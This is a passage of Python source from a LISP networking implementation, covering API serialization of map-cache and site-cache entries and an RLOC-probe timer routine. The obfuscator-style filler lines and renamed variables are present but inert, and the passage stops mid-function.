        if (rloc.rloc_exists()):
            r["address"] = rloc.rloc.print_address_no_iid()

        if (rloc.translated_port != 0):
            r["encap-port"] = str(rloc.translated_port)

        r["state"] = rloc.print_state()
        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name

        stats = rloc.stats.get_stats(False, False)
        if (stats): r["stats"] = stats

        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        reply_time = rloc.last_rloc_probe_reply
        if (reply_time):
            r["last-rloc-probe-reply"] = lisp_print_elapsed(reply_time)
            r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)

        r["rloc-hop-count"] = rloc.rloc_probe_hops
        r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops

        r["recent-rloc-probe-rtts"] = \
            [str(rtt) for rtt in rloc.recent_rloc_probe_rtts]

        rloc_set.append(r)

    entry["rloc-set"] = rloc_set

    data.append(entry)
    return([True, data])
if 85 - 85: i1IIi
if 79 - 79: I11i - I11i
if 25 - 25: OOooOOo / O0 / iIii1I11I1II1 + II111iiii * Ii1I
if 74 - 74: i1IIi . I1Ii111 / O0 + Oo0Ooo * OOooOOo
if 90 - 90: I1IiiI * II111iiii . Oo0Ooo % I1IiiI
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
def lisp_process_api_map_cache_entry(parms):
    """
    Look up one map-cache entry described by API parameters
    "instance-id", "eid-prefix" and optional "group-prefix", and return
    its serialized form in a list (empty list when not found).
    """
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Build the lookup EID from the supplied prefix string.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    dest = eid
    source = eid

    #
    # A multicast entry supplies a group-prefix; it becomes the lookup
    # destination with the EID-prefix as the source.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])
        dest = group

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if (mc): status, data = lisp_process_api_map_cache(mc, data)
    return(data)
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
if 3 - 3: OoO0O00 + O0 % Oo0Ooo * Oo0Ooo % i11iIiiIii
if 29 - 29: ooOoO0o / iII111i / OOooOOo - iIii1I11I1II1
def lisp_process_api_site_cache(se, data):
    """
    Per-entry callback used while walking the site-cache. A unicast
    site-EID is serialized directly; a multicast entry walks its
    source-cache so each source gets its own output row. Returns
    [True, data] so the walk continues.
    """
    if (se.group.is_null() == False):
        #
        # Multicast entry: serialize each source hanging off the group.
        #
        if (se.source_cache == None): return([True, data])
        data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
        return([True, data])

    return(lisp_gather_site_cache_data(se, data))
if 14 - 14: iIii1I11I1II1 / i11iIiiIii - o0oOOo0O0Ooo . iII111i * OoO0O00
if 5 - 5: Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if 56 - 56: Oo0Ooo
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    """
    Return a single map-server (ms_or_mr True) or map-resolver (False)
    entry matched either by "dns-name" or by exact "address" from the
    API parameter dictionary 'data'. Result is a one-element list, or
    an empty list when nothing matches.
    """
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if ("dns-name" in data) else None
    if ("address" in data):
        address.store_address(data["address"])

    value = {}
    if (ms_or_mr):
        for ms in lisp_map_servers_list.values():
            if (dns_name):
                if (dns_name != ms.dns_name): continue
            else:
                if (address.is_exact_match(ms.map_server) == False): continue

            value["dns-name"] = ms.dns_name
            value["address"] = ms.map_server.print_address_no_iid()
            value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
            return([value])
    else:
        for mr in lisp_map_resolvers_list.values():
            if (dns_name):
                if (dns_name != mr.dns_name): continue
            else:
                if (address.is_exact_match(mr.map_resolver) == False): continue

            value["dns-name"] = mr.dns_name
            value["address"] = mr.map_resolver.print_address_no_iid()
            value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
            return([value])

    return([])
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
if 98 - 98: I1ii11iIi11i - O0 + i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
if 80 - 80: Ii1I . i11iIiiIii % oO0o * o0oOOo0O0Ooo
if 56 - 56: I1Ii111 % iII111i / II111iiii - Oo0Ooo - Oo0Ooo - iIii1I11I1II1
if 67 - 67: iII111i
if 80 - 80: Ii1I . iII111i * I1IiiI * Ii1I
def lisp_process_api_database_mapping():
    """
    Serialize every configured database-mapping entry (EID-prefix,
    optional group-prefix, and its RLOC set) into a list of
    dictionaries for the API.
    """
    data = []

    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if (db.group.is_null() == False):
            entry["group-prefix"] = db.group.print_prefix()

        #
        # Serialize each RLOC-entry; only non-empty dictionaries are kept.
        #
        rlocs = []
        for rloc_entry in db.rloc_set:
            r = {}
            if (rloc_entry.rloc.is_null() == False):
                r["rloc"] = rloc_entry.rloc.print_address_no_iid()
            if (rloc_entry.rloc_name != None):
                r["rloc-name"] = rloc_entry.rloc_name
            if (rloc_entry.interface != None):
                r["interface"] = rloc_entry.interface

            translated = rloc_entry.translated_rloc
            if (translated.is_null() == False):
                r["translated-rloc"] = translated.print_address_no_iid()

            if (r != {}): rlocs.append(r)

        entry["rlocs"] = rlocs

        data.append(entry)

    return(data)
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
def lisp_gather_site_cache_data(se, data):
    """
    Serialize one site-EID entry 'se' into a dictionary and append it
    to list 'data'. Returns [True, data] so cache walks continue.
    """
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if (se.group.is_null() == False):
        entry["group-prefix"] = se.group.print_prefix_no_iid()

    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)

    registerer = se.last_registerer
    entry["last-registerer"] = "none" if registerer.is_null() else \
        registerer.print_address()
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if (se.xtr_id_present):
        entry["xtr-id"] = "0x" + lisp_hex_string(se.xtr_id)

    #
    # Serialize each registered RLOC.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if \
            rloc.rloc_exists() else "none"
        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)
        rloc_set.append(r)

    entry["registered-rlocs"] = rloc_set

    data.append(entry)
    return([True, data])
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
if 10 - 10: i1IIi + o0oOOo0O0Ooo
if 47 - 47: OOooOOo * IiII % I1Ii111 . OoOoOO00 - OoooooooOO / OoooooooOO
if 79 - 79: I11i % i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
def lisp_process_api_site_cache_entry(parms):
    """
    Look up one site-cache entry described by API parameters
    "instance-id", "eid-prefix" and optional "group-prefix", and return
    its serialized form in a list (empty list when not found).
    """
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Build the lookup EID from the supplied prefix string.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    #
    # A multicast entry supplies a group-prefix for the lookup.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])

    data = []
    se = lisp_site_eid_lookup(eid, group, False)
    if (se): lisp_gather_site_cache_data(se, data)
    return(data)
if 94 - 94: O0 % iII111i
if 90 - 90: IiII
if 1 - 1: I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OoooooooOO % oO0o + Ii1I
if 46 - 46: I1IiiI + OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if 90 - 90: oO0o * I1Ii111 / O0
def lisp_get_interface_instance_id(device, source_eid):
    """
    Return the instance-ID to use for packets arriving on interface
    'device'. Falls back to lisp_default_iid when the device is unknown
    or carries no instance-ID. When 'source_eid' is supplied and the
    device is multi-tenant, the most-specific multi-tenant EID-prefix
    covering the source EID selects the interface whose instance-ID
    is returned.
    """
    interface = None
    if (device in lisp_myinterfaces):
        interface = lisp_myinterfaces[device]

    #
    # Unknown device or no instance-ID configured on it.
    #
    if (interface == None or interface.instance_id == None):
        return(lisp_default_iid)

    #
    # Without a source EID the interface's own instance-ID is the answer.
    #
    iid = interface.get_instance_id()
    if (source_eid == None): return(iid)

    #
    # Multi-tenant case: find the longest multi-tenant EID-prefix on this
    # device covering the source EID. The source EID's instance-id is
    # temporarily rewritten for each is_more_specific() test and restored
    # afterwards, since prefix comparison is instance-id sensitive.
    #
    saved_iid = source_eid.instance_id
    best = None
    for interface in lisp_multi_tenant_interfaces:
        if (interface.device != device): continue

        prefix = interface.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if (source_eid.is_more_specific(prefix) == False): continue

        if (best == None or
            best.multi_tenant_eid.mask_len < prefix.mask_len):
            best = interface

    source_eid.instance_id = saved_iid

    if (best == None): return(iid)
    return(best.get_instance_id())
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if 81 - 81: i11iIiiIii / iIii1I11I1II1
if 73 - 73: i11iIiiIii . I1ii11iIi11i * OoOoOO00
if 95 - 95: i1IIi + iIii1I11I1II1 . I1Ii111 / I1Ii111
if 84 - 84: Oo0Ooo . OoO0O00 * IiII
if 95 - 95: OoO0O00
if 100 - 100: II111iiii
if 34 - 34: I11i % OOooOOo - iII111i % II111iiii
def lisp_allow_dynamic_eid(device, eid):
    """
    If 'eid' matches the dynamic-EID configuration of interface
    'device', return the device name to use for it (the configured
    dynamic-eid device when present, otherwise 'device' itself).
    Return None when the device is unknown or the EID does not match.
    """
    if (device not in lisp_myinterfaces): return(None)

    interface = lisp_myinterfaces[device]
    return_device = device if interface.dynamic_eid_device == None else \
        interface.dynamic_eid_device

    if (interface.does_dynamic_eid_match(eid)): return(return_device)
    return(None)
if 54 - 54: OoO0O00
if 38 - 38: II111iiii + o0oOOo0O0Ooo * I11i + I1Ii111 - II111iiii . OOooOOo
if 38 - 38: I1ii11iIi11i % OOooOOo + iII111i / Oo0Ooo / IiII / oO0o
if 2 - 2: iIii1I11I1II1
if 9 - 9: I1Ii111 / IiII
if 33 - 33: o0oOOo0O0Ooo + oO0o . o0oOOo0O0Ooo . I11i * OoooooooOO + iIii1I11I1II1
if 64 - 64: OoooooooOO . Ii1I
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    """
    (Re)arm the global RLOC-probe timer so that
    lisp_process_rloc_probe_timer(lisp_sockets) fires in 'interval'
    seconds. Any previously armed timer is cancelled first.
    """
    global lisp_rloc_probe_timer

    if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()

    timer = threading.Timer(interval, lisp_process_rloc_probe_timer,
        [lisp_sockets])
    lisp_rloc_probe_timer = timer
    timer.start()
    return
if 54 - 54: i1IIi % iII111i
if 16 - 16: II111iiii - Oo0Ooo
if 44 - 44: OOooOOo / Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if 85 - 85: iIii1I11I1II1 / Ii1I
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
if 97 - 97: I1Ii111 + I1ii11iIi11i
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
def lisp_show_rloc_probe_list():
    """
    Debug dump of the global lisp_rloc_probe_list: for each RLOC
    address key, print every (rloc-object, eid, group) tuple hanging
    off it along with the object's id and translated port.
    """
    lprint(bold("----- RLOC-probe-list -----", False))
    for key in lisp_rloc_probe_list:
        entries = lisp_rloc_probe_list[key]
        lprint("RLOC {}:".format(key))
        for rloc, eid, group in entries:
            lprint(" [{}, {}, {}, {}]".format(hex(id(rloc)),
                eid.print_prefix(), group.print_prefix(),
                rloc.translated_port))

    lprint(bold("---------------------------", False))
    return
if 12 - 12: Ii1I - oO0o % I1ii11iIi11i / oO0o
if 14 - 14: OOooOOo * iII111i . IiII + i1IIi % i1IIi
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if 59 - 59: ooOoO0o . iII111i - II111iiii
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
def lisp_mark_rlocs_for_other_eids(eid_list):
    """
    The first (rloc, eid, group) tuple in 'eid_list' has already been
    marked unreachable by the caller; mark the RLOC objects of all
    remaining tuples unreachable too, log one line per affected EID,
    and push each updated map-cache entry to the other lisp processes
    over IPC.
    """
    rloc, eid, group = eid_list[0]
    eid_strs = [lisp_print_eid_tuple(eid, group)]

    for rloc, eid, group in eid_list[1::]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eid_strs.append(lisp_print_eid_tuple(eid, group))

    #
    # NOTE(review): the address logged below is taken from the last tuple
    # iterated (or the first when the list has a single element) --
    # preserved from the original logic; all tuples share the same RLOC
    # address so the printed value is the same either way.
    #
    unreach = bold("unreachable", False)
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)

    for eid_str in eid_strs:
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach,
            green(eid_str, False)))

    #
    # Tell the other lisp processes about the state change for each EID.
    #
    for rloc, eid, group in eid_list:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)
    return
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
 #
 # Periodic RLOC-probe driver. Re-arms the probe timer, then walks the
 # global lisp_rloc_probe_list and sends an RLOC-probe Map-Request for
 # each RLOC chain that needs probing, applying several suppression
 # rules (gleaned EIDs, duplicate RLOC/port pairs, down state,
 # recent nonce-echo, probe already outstanding). Probes are paced:
 # after every 10th probe the loop sleeps 20 ms.
 #
 lisp_set_exception ( )
 if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
 # Re-arm ourselves for the next probe cycle before doing any work.
 lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
 if ( lisp_rloc_probing == False ) : return
 if 74 - 74: I11i . I11i
 if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
 if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
 if 62 - 62: i1IIi + I11i / OOooOOo - OoooooooOO % i1IIi . I1IiiI
 # Optional debug dump of the probe list.
 if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
 if 13 - 13: O0 * iII111i
 if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
 if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
 if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
 # Current default-route next-hops; used below to declare RLOCs whose
 # next-hop disappeared as unreachable.
 i11111ii11I11 = lisp_get_default_route_next_hops ( )
 if 3 - 3: Ii1I % iIii1I11I1II1 - I1Ii111 . oO0o . iII111i / o0oOOo0O0Ooo
 lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
 if 8 - 8: O0 - I1Ii111
 if 82 - 82: iII111i + II111iiii
 if 29 - 29: O0 % Ii1I * ooOoO0o % O0
 if 83 - 83: oO0o
 if 95 - 95: Oo0Ooo * O0 % i1IIi / iII111i + oO0o
 # OO counts probes sent (for pacing); OOO0oOooOOo00 is log decoration.
 OO = 0
 OOO0oOooOOo00 = bold ( "RLOC-probe" , False )
 for oo0O in lisp_rloc_probe_list . values ( ) :
  if 78 - 78: iII111i % i1IIi
  if 90 - 90: Ii1I * I11i + iII111i
  if 11 - 11: I1ii11iIi11i % IiII + OOooOOo . I1Ii111
  if 45 - 45: o0oOOo0O0Ooo / OOooOOo % i1IIi * Ii1I / i11iIiiIii
  if 89 - 89: ooOoO0o
  # Last RLOC probed for this address; used to suppress duplicates.
  O0O00OOoo00 = None
  for i1iI1Iii , OOo0O0O0o0 , O0o00oOOOO00 in oo0O :
   oo0o00OO = i1iI1Iii . rloc . print_address_no_iid ( )
   if 20 - 20: I11i
   if 37 - 37: I1Ii111
   if 19 - 19: I1ii11iIi11i / OOooOOo . I1IiiI / ooOoO0o + OoO0O00 + i11iIiiIii
   if 80 - 80: OoO0O00 . O0 / Ii1I % I1Ii111 / iII111i * I1IiiI
   # Suppress probes for gleaned EIDs unless gleaned RLOC-probing is on.
   ii1iI1 , iiIiiIi1II1ii , o00oo0 = lisp_allow_gleaning ( OOo0O0O0o0 , None , i1iI1Iii )
   if ( ii1iI1 and iiIiiIi1II1ii == False ) :
    oOo = green ( OOo0O0O0o0 . print_address ( ) , False )
    oo0o00OO += ":{}" . format ( i1iI1Iii . translated_port )
    lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( oo0o00OO , False ) , oOo ) )
    if 33 - 33: I1IiiI . OoooooooOO - o0oOOo0O0Ooo - i11iIiiIii * ooOoO0o % OOooOOo
    continue
   if 27 - 27: i11iIiiIii . OoO0O00 * I1ii11iIi11i * I1ii11iIi11i + ooOoO0o / OoO0O00
   if 26 - 26: I1IiiI + OoooooooOO * iII111i * iII111i - Ii1I - OOooOOo
   if 44 - 44: ooOoO0o % iII111i - o0oOOo0O0Ooo
   if 94 - 94: OoooooooOO * iIii1I11I1II1 + OOooOOo % I11i
   if 32 - 32: i11iIiiIii % OoOoOO00 % O0 / o0oOOo0O0Ooo + ooOoO0o
   if 4 - 4: OoOoOO00 / II111iiii . i1IIi + OOooOOo % II111iiii
   if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
   # Administratively down RLOCs are never probed.
   if ( i1iI1Iii . down_state ( ) ) : continue
   if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
   if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
   if 89 - 89: I1Ii111
   if 29 - 29: I11i * ooOoO0o - OoooooooOO
   if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
   if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
   if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
   if 73 - 73: OoooooooOO
   if 25 - 25: i1IIi . II111iiii . I1Ii111
   if 81 - 81: II111iiii + OoOoOO00 * II111iiii / iIii1I11I1II1 - Oo0Ooo % oO0o
   if 66 - 66: ooOoO0o % O0 + iIii1I11I1II1 * I1Ii111 - I1Ii111
   # Duplicate suppression: when the previous tuple probed the same
   # RLOC address with the same port and rloc-name, carry the probe
   # nonce over and skip sending another probe.
   if ( O0O00OOoo00 ) :
    i1iI1Iii . last_rloc_probe_nonce = O0O00OOoo00 . last_rloc_probe_nonce
    if 61 - 61: I1ii11iIi11i
    if ( O0O00OOoo00 . translated_port == i1iI1Iii . translated_port and O0O00OOoo00 . rloc_name == i1iI1Iii . rloc_name ) :
     if 12 - 12: OoO0O00
     oOo = green ( lisp_print_eid_tuple ( OOo0O0O0o0 , O0o00oOOOO00 ) , False )
     lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( oo0o00OO , False ) , oOo ) )
     if 97 - 97: OOooOOo . Oo0Ooo . oO0o * i1IIi
     continue
   if 7 - 7: Oo0Ooo
   if 38 - 38: Oo0Ooo - I1ii11iIi11i
   if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
   # Walk the chain of RLOCs (next_rloc links) for this entry.
   # iiIIII1I1ii remembers an original host-route next-hop to restore.
   iiIIII1I1ii = None
   oOo00O = None
   while ( True ) :
    oOo00O = i1iI1Iii if oOo00O == None else oOo00O . next_rloc
    if ( oOo00O == None ) : break
    if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
    if 3 - 3: Ii1I
    if 71 - 71: iIii1I11I1II1 . OOooOOo / I11i / i1IIi
    if 69 - 69: i1IIi / iII111i + Ii1I + I11i + IiII
    if 86 - 86: Oo0Ooo
    # If this RLOC's next-hop is no longer a default-route next-hop,
    # mark it unreachable (if it was up) and skip probing it.
    if ( oOo00O . rloc_next_hop != None ) :
     if ( oOo00O . rloc_next_hop not in i11111ii11I11 ) :
      if ( oOo00O . up_state ( ) ) :
       OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
       oOo00O . state = LISP_RLOC_UNREACH_STATE
       oOo00O . last_state_change = lisp_get_timestamp ( )
       lisp_update_rtr_updown ( oOo00O . rloc , False )
       if 97 - 97: I1IiiI
       IiI1Iiiii1Iii = bold ( "unreachable" , False )
       lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( IiI1Ii , OooOOOoOoo0O0 ,
        red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
      continue
    if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
    if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
    if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
    if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
    if 64 - 64: I1IiiI % ooOoO0o
    if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
    # A probe is already outstanding: give the reply a full probe
    # interval to arrive before probing again.
    I1IIII = oOo00O . last_rloc_probe
    O0o0O0OoOOoO = 0 if I1IIII == None else time . time ( ) - I1IIII
    if ( oOo00O . unreach_state ( ) and O0o0O0OoOOoO < LISP_RLOC_PROBE_INTERVAL ) :
     lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( oo0o00OO , False ) ) )
     if 66 - 66: iIii1I11I1II1 - Oo0Ooo % OoooooooOO % O0
     continue
    if 33 - 33: I1Ii111 / II111iiii / II111iiii
    if 15 - 15: O0 * OoooooooOO - O0 + OoooooooOO
    if 40 - 40: O0 * OoooooooOO - oO0o + iIii1I11I1II1 * OOooOOo + I1ii11iIi11i
    if 43 - 43: OoO0O00 . O0
    if 36 - 36: I11i
    if 28 - 28: ooOoO0o
    # Nonce-echo bookkeeping: a timed-out request-nonce means the
    # echo failed, so declare the RLOC unreachable.
    Oo0ooO0O0o00o = lisp_get_echo_nonce ( None , oo0o00OO )
    if ( Oo0ooO0O0o00o and Oo0ooO0O0o00o . request_nonce_timeout ( ) ) :
     oOo00O . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
     oOo00O . last_state_change = lisp_get_timestamp ( )
     IiI1Iiiii1Iii = bold ( "unreachable" , False )
     lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
     if 1 - 1: IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
     lisp_update_rtr_updown ( oOo00O . rloc , False )
     continue
    if 85 - 85: i11iIiiIii + OoOoOO00
    if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
    if 60 - 60: OOooOOo . Ii1I
    if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
    if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
    if 38 - 38: IiII / I11i / IiII * iII111i
    # A recent nonce-echo proves reachability; no probe needed.
    if ( Oo0ooO0O0o00o and Oo0ooO0O0o00o . recently_echoed ( ) ) :
     lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( oo0o00OO , False ) ) )
     if 30 - 30: oO0o
     continue
    if 30 - 30: IiII / OoO0O00
    if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
    if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
    if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
    if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
    if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
    # No reply within the reply-wait window: transition an up RLOC to
    # unreachable and propagate that to the other EIDs sharing it.
    if ( oOo00O . last_rloc_probe != None ) :
     I1IIII = oOo00O . last_rloc_probe_reply
     if ( I1IIII == None ) : I1IIII = 0
     O0o0O0OoOOoO = time . time ( ) - I1IIII
     if ( oOo00O . up_state ( ) and O0o0O0OoOOoO >= LISP_RLOC_PROBE_REPLY_WAIT ) :
      if 91 - 91: OoooooooOO * OoooooooOO
      oOo00O . state = LISP_RLOC_UNREACH_STATE
      oOo00O . last_state_change = lisp_get_timestamp ( )
      lisp_update_rtr_updown ( oOo00O . rloc , False )
      IiI1Iiiii1Iii = bold ( "unreachable" , False )
      lprint ( "RLOC {} went {}, probe it" . format ( red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
      if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
      if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
      lisp_mark_rlocs_for_other_eids ( oo0O )
    if 33 - 33: OOooOOo % OoooooooOO
    if 98 - 98: Ii1I
    if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
    oOo00O . last_rloc_probe = lisp_get_timestamp ( )
    if 95 - 95: iIii1I11I1II1 / O0 % O0
    o0O0o00ooOOOO0 = "" if oOo00O . unreach_state ( ) == False else " unreachable"
    if 18 - 18: OoO0O00 * ooOoO0o
    if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
    if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
    if 67 - 67: I1IiiI
    if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
    if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
    if 30 - 30: I11i . o0oOOo0O0Ooo / II111iiii
    # When the RLOC has a specific next-hop, temporarily install a
    # host route so the probe egresses via that next-hop.
    ooooOOO0OoO = ""
    IiI1Ii = None
    if ( oOo00O . rloc_next_hop != None ) :
